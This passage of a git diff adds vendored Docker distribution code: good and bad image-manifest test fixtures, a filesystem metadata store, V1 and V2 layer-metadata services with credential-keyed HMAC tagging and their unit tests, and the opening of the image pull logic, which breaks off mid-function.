"schemaVersion": 1, + "name": "library/hello-world", + "tag": "latest", + "architecture": "amd64", + "fsLayers": [ + { + "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4" + }, + { + "blobSum": "sha256:03f4658f8b782e12230c1783426bd3bacce651ce582a4ffb6fbbfa2079428ecb" + } + ], + "history": [ + { + "v1Compatibility": 
"{\"id\":\"af340544ed62de0680f441c71fa1a80cb084678fed42bae393e543faea3a572c\",\"parent\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"created\":\"2015-08-06T23:53:22.608577814Z\",\"container\":\"c2b715156f640c7ac7d98472ea24335aba5432a1323a3bb722697e6d37ef794f\",\"container_config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) CMD [\\\"/hello\\\"]\"],\"Image\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":{}},\"docker_version\":\"1.7.1\",\"config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/hello\"],\"Image\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n" + }, + { + "v1Compatibility": "{\"id\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"created\":\"2015-08-06T23:53:22.241352727Z\",\"container\":\"9aeb0006ffa72a8287564caaea87625896853701459261d3b569e320c0c9d5dc\",\"container_config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY 
file:4abd3bff60458ca3b079d7b131ce26b2719055a030dfa96ff827da2b7c7038a7 in /\"],\"Image\":\"\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":null},\"docker_version\":\"1.7.1\",\"config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":null,\"Image\":\"\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":null},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":960}\n" + } + ], + "fsLayers": [ + { + "blobSum": "sha256:ffff95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4" + }, + { + "blobSum": "sha256:ffff658f8b782e12230c1783426bd3bacce651ce582a4ffb6fbbfa2079428ecb" + } + ], + "signatures": [ + { + "header": { + "jwk": { + "crv": "P-256", + "kid": "OIH7:HQFS:44FK:45VB:3B53:OIAG:TPL4:ATF5:6PNE:MGHN:NHQX:2GE4", + "kty": "EC", + "x": "Cu_UyxwLgHzE9rvlYSmvVdqYCXY42E9eNhBb0xNv0SQ", + "y": "zUsjWJkeKQ5tv7S-hl1Tg71cd-CqnrtiiLxSi6N_yc8" + }, + "alg": "ES256" + }, + "signature": "Y6xaFz9Sy-OtcnKQS1Ilq3Dh8cu4h3nBTJCpOTF1XF7vKtcxxA_xMP8-SgDo869SJ3VsvgPL9-Xn-OoYG2rb1A", + "protected": "eyJmb3JtYXRMZW5ndGgiOjMxOTcsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAxNS0wOS0xMVQwNDoxMzo0OFoifQ" + } + ] +} diff --git a/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/good_manifest b/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/good_manifest new file mode 100644 index 0000000000..b107de3226 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/good_manifest @@ -0,0 +1,38 @@ +{ + "schemaVersion": 1, + "name": "library/hello-world", + "tag": "latest", + "architecture": "amd64", + "fsLayers": [ + { 
+ "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4" + }, + { + "blobSum": "sha256:03f4658f8b782e12230c1783426bd3bacce651ce582a4ffb6fbbfa2079428ecb" + } + ], + "history": [ + { + "v1Compatibility": "{\"id\":\"af340544ed62de0680f441c71fa1a80cb084678fed42bae393e543faea3a572c\",\"parent\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"created\":\"2015-08-06T23:53:22.608577814Z\",\"container\":\"c2b715156f640c7ac7d98472ea24335aba5432a1323a3bb722697e6d37ef794f\",\"container_config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) CMD [\\\"/hello\\\"]\"],\"Image\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":{}},\"docker_version\":\"1.7.1\",\"config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/hello\"],\"Image\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n" + }, + { + "v1Compatibility": 
"{\"id\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"created\":\"2015-08-06T23:53:22.241352727Z\",\"container\":\"9aeb0006ffa72a8287564caaea87625896853701459261d3b569e320c0c9d5dc\",\"container_config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY file:4abd3bff60458ca3b079d7b131ce26b2719055a030dfa96ff827da2b7c7038a7 in /\"],\"Image\":\"\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":null},\"docker_version\":\"1.7.1\",\"config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":null,\"Image\":\"\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":null},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":960}\n" + } + ], + "signatures": [ + { + "header": { + "jwk": { + "crv": "P-256", + "kid": "OIH7:HQFS:44FK:45VB:3B53:OIAG:TPL4:ATF5:6PNE:MGHN:NHQX:2GE4", + "kty": "EC", + "x": "Cu_UyxwLgHzE9rvlYSmvVdqYCXY42E9eNhBb0xNv0SQ", + "y": "zUsjWJkeKQ5tv7S-hl1Tg71cd-CqnrtiiLxSi6N_yc8" + }, + "alg": "ES256" + }, + "signature": "Y6xaFz9Sy-OtcnKQS1Ilq3Dh8cu4h3nBTJCpOTF1XF7vKtcxxA_xMP8-SgDo869SJ3VsvgPL9-Xn-OoYG2rb1A", + "protected": "eyJmb3JtYXRMZW5ndGgiOjMxOTcsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAxNS0wOS0xMVQwNDoxMzo0OFoifQ" + } + ] +} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/distribution/metadata/metadata.go b/vendor/github.com/docker/docker/distribution/metadata/metadata.go new file 
mode 100644 index 0000000000..05ba4f817d --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/metadata/metadata.go @@ -0,0 +1,75 @@ +package metadata + +import ( + "io/ioutil" + "os" + "path/filepath" + "sync" + + "github.com/docker/docker/pkg/ioutils" +) + +// Store implements a K/V store for mapping distribution-related IDs +// to on-disk layer IDs and image IDs. The namespace identifies the type of +// mapping (i.e. "v1ids" or "artifacts"). MetadataStore is goroutine-safe. +type Store interface { + // Get retrieves data by namespace and key. + Get(namespace string, key string) ([]byte, error) + // Set writes data indexed by namespace and key. + Set(namespace, key string, value []byte) error + // Delete removes data indexed by namespace and key. + Delete(namespace, key string) error +} + +// FSMetadataStore uses the filesystem to associate metadata with layer and +// image IDs. +type FSMetadataStore struct { + sync.RWMutex + basePath string +} + +// NewFSMetadataStore creates a new filesystem-based metadata store. +func NewFSMetadataStore(basePath string) (*FSMetadataStore, error) { + if err := os.MkdirAll(basePath, 0700); err != nil { + return nil, err + } + return &FSMetadataStore{ + basePath: basePath, + }, nil +} + +func (store *FSMetadataStore) path(namespace, key string) string { + return filepath.Join(store.basePath, namespace, key) +} + +// Get retrieves data by namespace and key. The data is read from a file named +// after the key, stored in the namespace's directory. +func (store *FSMetadataStore) Get(namespace string, key string) ([]byte, error) { + store.RLock() + defer store.RUnlock() + + return ioutil.ReadFile(store.path(namespace, key)) +} + +// Set writes data indexed by namespace and key. The data is written to a file +// named after the key, stored in the namespace's directory. 
+func (store *FSMetadataStore) Set(namespace, key string, value []byte) error { + store.Lock() + defer store.Unlock() + + path := store.path(namespace, key) + if err := os.MkdirAll(filepath.Dir(path), 0755); err != nil { + return err + } + return ioutils.AtomicWriteFile(path, value, 0644) +} + +// Delete removes data indexed by namespace and key. The data file named after +// the key, stored in the namespace's directory is deleted. +func (store *FSMetadataStore) Delete(namespace, key string) error { + store.Lock() + defer store.Unlock() + + path := store.path(namespace, key) + return os.Remove(path) +} diff --git a/vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go new file mode 100644 index 0000000000..f262d4dc34 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go @@ -0,0 +1,51 @@ +package metadata + +import ( + "github.com/docker/docker/image/v1" + "github.com/docker/docker/layer" + "github.com/pkg/errors" +) + +// V1IDService maps v1 IDs to layers on disk. +type V1IDService struct { + store Store +} + +// NewV1IDService creates a new V1 ID mapping service. +func NewV1IDService(store Store) *V1IDService { + return &V1IDService{ + store: store, + } +} + +// namespace returns the namespace used by this service. +func (idserv *V1IDService) namespace() string { + return "v1id" +} + +// Get finds a layer by its V1 ID. +func (idserv *V1IDService) Get(v1ID, registry string) (layer.DiffID, error) { + if idserv.store == nil { + return "", errors.New("no v1IDService storage") + } + if err := v1.ValidateID(v1ID); err != nil { + return layer.DiffID(""), err + } + + idBytes, err := idserv.store.Get(idserv.namespace(), registry+","+v1ID) + if err != nil { + return layer.DiffID(""), err + } + return layer.DiffID(idBytes), nil +} + +// Set associates an image with a V1 ID. 
+func (idserv *V1IDService) Set(v1ID, registry string, id layer.DiffID) error { + if idserv.store == nil { + return nil + } + if err := v1.ValidateID(v1ID); err != nil { + return err + } + return idserv.store.Set(idserv.namespace(), registry+","+v1ID, []byte(id)) +} diff --git a/vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go new file mode 100644 index 0000000000..556886581e --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go @@ -0,0 +1,83 @@ +package metadata + +import ( + "io/ioutil" + "os" + "testing" + + "github.com/docker/docker/layer" +) + +func TestV1IDService(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "v1-id-service-test") + if err != nil { + t.Fatalf("could not create temp dir: %v", err) + } + defer os.RemoveAll(tmpDir) + + metadataStore, err := NewFSMetadataStore(tmpDir) + if err != nil { + t.Fatalf("could not create metadata store: %v", err) + } + v1IDService := NewV1IDService(metadataStore) + + testVectors := []struct { + registry string + v1ID string + layerID layer.DiffID + }{ + { + registry: "registry1", + v1ID: "f0cd5ca10b07f35512fc2f1cbf9a6cefbdb5cba70ac6b0c9e5988f4497f71937", + layerID: layer.DiffID("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"), + }, + { + registry: "registry2", + v1ID: "9e3447ca24cb96d86ebd5960cb34d1299b07e0a0e03801d90b9969a2c187dd6e", + layerID: layer.DiffID("sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa"), + }, + { + registry: "registry1", + v1ID: "9e3447ca24cb96d86ebd5960cb34d1299b07e0a0e03801d90b9969a2c187dd6e", + layerID: layer.DiffID("sha256:03f4658f8b782e12230c1783426bd3bacce651ce582a4ffb6fbbfa2079428ecb"), + }, + } + + // Set some associations + for _, vec := range testVectors { + err := v1IDService.Set(vec.v1ID, vec.registry, vec.layerID) + if err != nil { + t.Fatalf("error calling Set: %v", err) + } + } + + // 
Check the correct values are read back + for _, vec := range testVectors { + layerID, err := v1IDService.Get(vec.v1ID, vec.registry) + if err != nil { + t.Fatalf("error calling Get: %v", err) + } + if layerID != vec.layerID { + t.Fatal("Get returned incorrect layer ID") + } + } + + // Test Get on a nonexistent entry + _, err = v1IDService.Get("82379823067823853223359023576437723560923756b03560378f4497753917", "registry1") + if err == nil { + t.Fatal("expected error looking up nonexistent entry") + } + + // Overwrite one of the entries and read it back + err = v1IDService.Set(testVectors[0].v1ID, testVectors[0].registry, testVectors[1].layerID) + if err != nil { + t.Fatalf("error calling Set: %v", err) + } + layerID, err := v1IDService.Get(testVectors[0].v1ID, testVectors[0].registry) + if err != nil { + t.Fatalf("error calling Get: %v", err) + } + if layerID != testVectors[1].layerID { + t.Fatal("Get returned incorrect layer ID") + } +} diff --git a/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go new file mode 100644 index 0000000000..02d1b4ad21 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go @@ -0,0 +1,241 @@ +package metadata + +import ( + "crypto/hmac" + "crypto/sha256" + "encoding/hex" + "encoding/json" + "errors" + + "github.com/docker/distribution/digest" + "github.com/docker/docker/api/types" + "github.com/docker/docker/layer" +) + +// V2MetadataService maps layer IDs to a set of known metadata for +// the layer. 
+type V2MetadataService interface { + GetMetadata(diffID layer.DiffID) ([]V2Metadata, error) + GetDiffID(dgst digest.Digest) (layer.DiffID, error) + Add(diffID layer.DiffID, metadata V2Metadata) error + TagAndAdd(diffID layer.DiffID, hmacKey []byte, metadata V2Metadata) error + Remove(metadata V2Metadata) error +} + +// v2MetadataService implements V2MetadataService +type v2MetadataService struct { + store Store +} + +var _ V2MetadataService = &v2MetadataService{} + +// V2Metadata contains the digest and source repository information for a layer. +type V2Metadata struct { + Digest digest.Digest + SourceRepository string + // HMAC hashes above attributes with recent authconfig digest used as a key in order to determine matching + // metadata entries accompanied by the same credentials without actually exposing them. + HMAC string +} + +// CheckV2MetadataHMAC return true if the given "meta" is tagged with a hmac hashed by the given "key". +func CheckV2MetadataHMAC(meta *V2Metadata, key []byte) bool { + if len(meta.HMAC) == 0 || len(key) == 0 { + return len(meta.HMAC) == 0 && len(key) == 0 + } + mac := hmac.New(sha256.New, key) + mac.Write([]byte(meta.Digest)) + mac.Write([]byte(meta.SourceRepository)) + expectedMac := mac.Sum(nil) + + storedMac, err := hex.DecodeString(meta.HMAC) + if err != nil { + return false + } + + return hmac.Equal(storedMac, expectedMac) +} + +// ComputeV2MetadataHMAC returns a hmac for the given "meta" hash by the given key. +func ComputeV2MetadataHMAC(key []byte, meta *V2Metadata) string { + if len(key) == 0 || meta == nil { + return "" + } + mac := hmac.New(sha256.New, key) + mac.Write([]byte(meta.Digest)) + mac.Write([]byte(meta.SourceRepository)) + return hex.EncodeToString(mac.Sum(nil)) +} + +// ComputeV2MetadataHMACKey returns a key for the given "authConfig" that can be used to hash v2 metadata +// entries. 
+func ComputeV2MetadataHMACKey(authConfig *types.AuthConfig) ([]byte, error) { + if authConfig == nil { + return nil, nil + } + key := authConfigKeyInput{ + Username: authConfig.Username, + Password: authConfig.Password, + Auth: authConfig.Auth, + IdentityToken: authConfig.IdentityToken, + RegistryToken: authConfig.RegistryToken, + } + buf, err := json.Marshal(&key) + if err != nil { + return nil, err + } + return []byte(digest.FromBytes([]byte(buf))), nil +} + +// authConfigKeyInput is a reduced AuthConfig structure holding just relevant credential data eligible for +// hmac key creation. +type authConfigKeyInput struct { + Username string `json:"username,omitempty"` + Password string `json:"password,omitempty"` + Auth string `json:"auth,omitempty"` + + IdentityToken string `json:"identitytoken,omitempty"` + RegistryToken string `json:"registrytoken,omitempty"` +} + +// maxMetadata is the number of metadata entries to keep per layer DiffID. +const maxMetadata = 50 + +// NewV2MetadataService creates a new diff ID to v2 metadata mapping service. +func NewV2MetadataService(store Store) V2MetadataService { + return &v2MetadataService{ + store: store, + } +} + +func (serv *v2MetadataService) diffIDNamespace() string { + return "v2metadata-by-diffid" +} + +func (serv *v2MetadataService) digestNamespace() string { + return "diffid-by-digest" +} + +func (serv *v2MetadataService) diffIDKey(diffID layer.DiffID) string { + return string(digest.Digest(diffID).Algorithm()) + "/" + digest.Digest(diffID).Hex() +} + +func (serv *v2MetadataService) digestKey(dgst digest.Digest) string { + return string(dgst.Algorithm()) + "/" + dgst.Hex() +} + +// GetMetadata finds the metadata associated with a layer DiffID. 
+func (serv *v2MetadataService) GetMetadata(diffID layer.DiffID) ([]V2Metadata, error) { + if serv.store == nil { + return nil, errors.New("no metadata storage") + } + jsonBytes, err := serv.store.Get(serv.diffIDNamespace(), serv.diffIDKey(diffID)) + if err != nil { + return nil, err + } + + var metadata []V2Metadata + if err := json.Unmarshal(jsonBytes, &metadata); err != nil { + return nil, err + } + + return metadata, nil +} + +// GetDiffID finds a layer DiffID from a digest. +func (serv *v2MetadataService) GetDiffID(dgst digest.Digest) (layer.DiffID, error) { + if serv.store == nil { + return layer.DiffID(""), errors.New("no metadata storage") + } + diffIDBytes, err := serv.store.Get(serv.digestNamespace(), serv.digestKey(dgst)) + if err != nil { + return layer.DiffID(""), err + } + + return layer.DiffID(diffIDBytes), nil +} + +// Add associates metadata with a layer DiffID. If too many metadata entries are +// present, the oldest one is dropped. +func (serv *v2MetadataService) Add(diffID layer.DiffID, metadata V2Metadata) error { + if serv.store == nil { + // Support a service which has no backend storage, in this case + // an add becomes a no-op. 
+ // TODO: implement in memory storage + return nil + } + oldMetadata, err := serv.GetMetadata(diffID) + if err != nil { + oldMetadata = nil + } + newMetadata := make([]V2Metadata, 0, len(oldMetadata)+1) + + // Copy all other metadata to new slice + for _, oldMeta := range oldMetadata { + if oldMeta != metadata { + newMetadata = append(newMetadata, oldMeta) + } + } + + newMetadata = append(newMetadata, metadata) + + if len(newMetadata) > maxMetadata { + newMetadata = newMetadata[len(newMetadata)-maxMetadata:] + } + + jsonBytes, err := json.Marshal(newMetadata) + if err != nil { + return err + } + + err = serv.store.Set(serv.diffIDNamespace(), serv.diffIDKey(diffID), jsonBytes) + if err != nil { + return err + } + + return serv.store.Set(serv.digestNamespace(), serv.digestKey(metadata.Digest), []byte(diffID)) +} + +// TagAndAdd amends the given "meta" for hmac hashed by the given "hmacKey" and associates it with a layer +// DiffID. If too many metadata entries are present, the oldest one is dropped. +func (serv *v2MetadataService) TagAndAdd(diffID layer.DiffID, hmacKey []byte, meta V2Metadata) error { + meta.HMAC = ComputeV2MetadataHMAC(hmacKey, &meta) + return serv.Add(diffID, meta) +} + +// Remove unassociates a metadata entry from a layer DiffID. +func (serv *v2MetadataService) Remove(metadata V2Metadata) error { + if serv.store == nil { + // Support a service which has no backend storage, in this case + // an remove becomes a no-op. 
+ // TODO: implement in memory storage + return nil + } + diffID, err := serv.GetDiffID(metadata.Digest) + if err != nil { + return err + } + oldMetadata, err := serv.GetMetadata(diffID) + if err != nil { + oldMetadata = nil + } + newMetadata := make([]V2Metadata, 0, len(oldMetadata)) + + // Copy all other metadata to new slice + for _, oldMeta := range oldMetadata { + if oldMeta != metadata { + newMetadata = append(newMetadata, oldMeta) + } + } + + if len(newMetadata) == 0 { + return serv.store.Delete(serv.diffIDNamespace(), serv.diffIDKey(diffID)) + } + + jsonBytes, err := json.Marshal(newMetadata) + if err != nil { + return err + } + + return serv.store.Set(serv.diffIDNamespace(), serv.diffIDKey(diffID), jsonBytes) +} diff --git a/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go new file mode 100644 index 0000000000..7b0ecb1572 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go @@ -0,0 +1,115 @@ +package metadata + +import ( + "encoding/hex" + "io/ioutil" + "math/rand" + "os" + "reflect" + "testing" + + "github.com/docker/distribution/digest" + "github.com/docker/docker/layer" +) + +func TestV2MetadataService(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "blobsum-storage-service-test") + if err != nil { + t.Fatalf("could not create temp dir: %v", err) + } + defer os.RemoveAll(tmpDir) + + metadataStore, err := NewFSMetadataStore(tmpDir) + if err != nil { + t.Fatalf("could not create metadata store: %v", err) + } + V2MetadataService := NewV2MetadataService(metadataStore) + + tooManyBlobSums := make([]V2Metadata, 100) + for i := range tooManyBlobSums { + randDigest := randomDigest() + tooManyBlobSums[i] = V2Metadata{Digest: randDigest} + } + + testVectors := []struct { + diffID layer.DiffID + metadata []V2Metadata + }{ + { + diffID: 
layer.DiffID("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"), + metadata: []V2Metadata{ + {Digest: digest.Digest("sha256:f0cd5ca10b07f35512fc2f1cbf9a6cefbdb5cba70ac6b0c9e5988f4497f71937")}, + }, + }, + { + diffID: layer.DiffID("sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa"), + metadata: []V2Metadata{ + {Digest: digest.Digest("sha256:f0cd5ca10b07f35512fc2f1cbf9a6cefbdb5cba70ac6b0c9e5988f4497f71937")}, + {Digest: digest.Digest("sha256:9e3447ca24cb96d86ebd5960cb34d1299b07e0a0e03801d90b9969a2c187dd6e")}, + }, + }, + { + diffID: layer.DiffID("sha256:03f4658f8b782e12230c1783426bd3bacce651ce582a4ffb6fbbfa2079428ecb"), + metadata: tooManyBlobSums, + }, + } + + // Set some associations + for _, vec := range testVectors { + for _, blobsum := range vec.metadata { + err := V2MetadataService.Add(vec.diffID, blobsum) + if err != nil { + t.Fatalf("error calling Set: %v", err) + } + } + } + + // Check the correct values are read back + for _, vec := range testVectors { + metadata, err := V2MetadataService.GetMetadata(vec.diffID) + if err != nil { + t.Fatalf("error calling Get: %v", err) + } + expectedMetadataEntries := len(vec.metadata) + if expectedMetadataEntries > 50 { + expectedMetadataEntries = 50 + } + if !reflect.DeepEqual(metadata, vec.metadata[len(vec.metadata)-expectedMetadataEntries:len(vec.metadata)]) { + t.Fatal("Get returned incorrect layer ID") + } + } + + // Test GetMetadata on a nonexistent entry + _, err = V2MetadataService.GetMetadata(layer.DiffID("sha256:82379823067823853223359023576437723560923756b03560378f4497753917")) + if err == nil { + t.Fatal("expected error looking up nonexistent entry") + } + + // Test GetDiffID on a nonexistent entry + _, err = V2MetadataService.GetDiffID(digest.Digest("sha256:82379823067823853223359023576437723560923756b03560378f4497753917")) + if err == nil { + t.Fatal("expected error looking up nonexistent entry") + } + + // Overwrite one of the entries and read it back + err = 
V2MetadataService.Add(testVectors[1].diffID, testVectors[0].metadata[0]) + if err != nil { + t.Fatalf("error calling Add: %v", err) + } + diffID, err := V2MetadataService.GetDiffID(testVectors[0].metadata[0].Digest) + if err != nil { + t.Fatalf("error calling GetDiffID: %v", err) + } + if diffID != testVectors[1].diffID { + t.Fatal("GetDiffID returned incorrect diffID") + } +} + +func randomDigest() digest.Digest { + b := [32]byte{} + for i := 0; i < len(b); i++ { + b[i] = byte(rand.Intn(256)) + } + d := hex.EncodeToString(b[:]) + return digest.Digest("sha256:" + d) +} diff --git a/vendor/github.com/docker/docker/distribution/pull.go b/vendor/github.com/docker/docker/distribution/pull.go new file mode 100644 index 0000000000..a0acfe5b6b --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/pull.go @@ -0,0 +1,200 @@ +package distribution + +import ( + "fmt" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/api" + "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "golang.org/x/net/context" +) + +// Puller is an interface that abstracts pulling for different API versions. +type Puller interface { + // Pull tries to pull the image referenced by `tag` + // Pull returns an error if any, as well as a boolean that determines whether to retry Pull on the next configured endpoint. + // + Pull(ctx context.Context, ref reference.Named) error +} + +// newPuller returns a Puller interface that will pull from either a v1 or v2 +// registry. The endpoint argument contains a Version field that determines +// whether a v1 or v2 puller will be created. The other parameters are passed +// through to the underlying puller implementation for use during the actual +// pull operation. 
+func newPuller(endpoint registry.APIEndpoint, repoInfo *registry.RepositoryInfo, imagePullConfig *ImagePullConfig) (Puller, error) { + switch endpoint.Version { + case registry.APIVersion2: + return &v2Puller{ + V2MetadataService: metadata.NewV2MetadataService(imagePullConfig.MetadataStore), + endpoint: endpoint, + config: imagePullConfig, + repoInfo: repoInfo, + }, nil + case registry.APIVersion1: + return &v1Puller{ + v1IDService: metadata.NewV1IDService(imagePullConfig.MetadataStore), + endpoint: endpoint, + config: imagePullConfig, + repoInfo: repoInfo, + }, nil + } + return nil, fmt.Errorf("unknown version %d for registry %s", endpoint.Version, endpoint.URL) +} + +// Pull initiates a pull operation. image is the repository name to pull, and +// tag may be either empty, or indicate a specific tag to pull. +func Pull(ctx context.Context, ref reference.Named, imagePullConfig *ImagePullConfig) error { + // Resolve the Repository name from fqn to RepositoryInfo + repoInfo, err := imagePullConfig.RegistryService.ResolveRepository(ref) + if err != nil { + return err + } + + // makes sure name is not empty or `scratch` + if err := ValidateRepoName(repoInfo.Name()); err != nil { + return err + } + + endpoints, err := imagePullConfig.RegistryService.LookupPullEndpoints(repoInfo.Hostname()) + if err != nil { + return err + } + + var ( + lastErr error + + // discardNoSupportErrors is used to track whether an endpoint encountered an error of type registry.ErrNoSupport + // By default it is false, which means that if an ErrNoSupport error is encountered, it will be saved in lastErr. + // As soon as another kind of error is encountered, discardNoSupportErrors is set to true, avoiding the saving of + // any subsequent ErrNoSupport errors in lastErr. 
+ // It's needed for pull-by-digest on v1 endpoints: if there are only v1 endpoints configured, the error should be + // returned and displayed, but if there was a v2 endpoint which supports pull-by-digest, then the last relevant + // error is the ones from v2 endpoints not v1. + discardNoSupportErrors bool + + // confirmedV2 is set to true if a pull attempt managed to + // confirm that it was talking to a v2 registry. This will + // prevent fallback to the v1 protocol. + confirmedV2 bool + + // confirmedTLSRegistries is a map indicating which registries + // are known to be using TLS. There should never be a plaintext + // retry for any of these. + confirmedTLSRegistries = make(map[string]struct{}) + ) + for _, endpoint := range endpoints { + if imagePullConfig.RequireSchema2 && endpoint.Version == registry.APIVersion1 { + continue + } + + if confirmedV2 && endpoint.Version == registry.APIVersion1 { + logrus.Debugf("Skipping v1 endpoint %s because v2 registry was detected", endpoint.URL) + continue + } + + if endpoint.URL.Scheme != "https" { + if _, confirmedTLS := confirmedTLSRegistries[endpoint.URL.Host]; confirmedTLS { + logrus.Debugf("Skipping non-TLS endpoint %s for host/port that appears to use TLS", 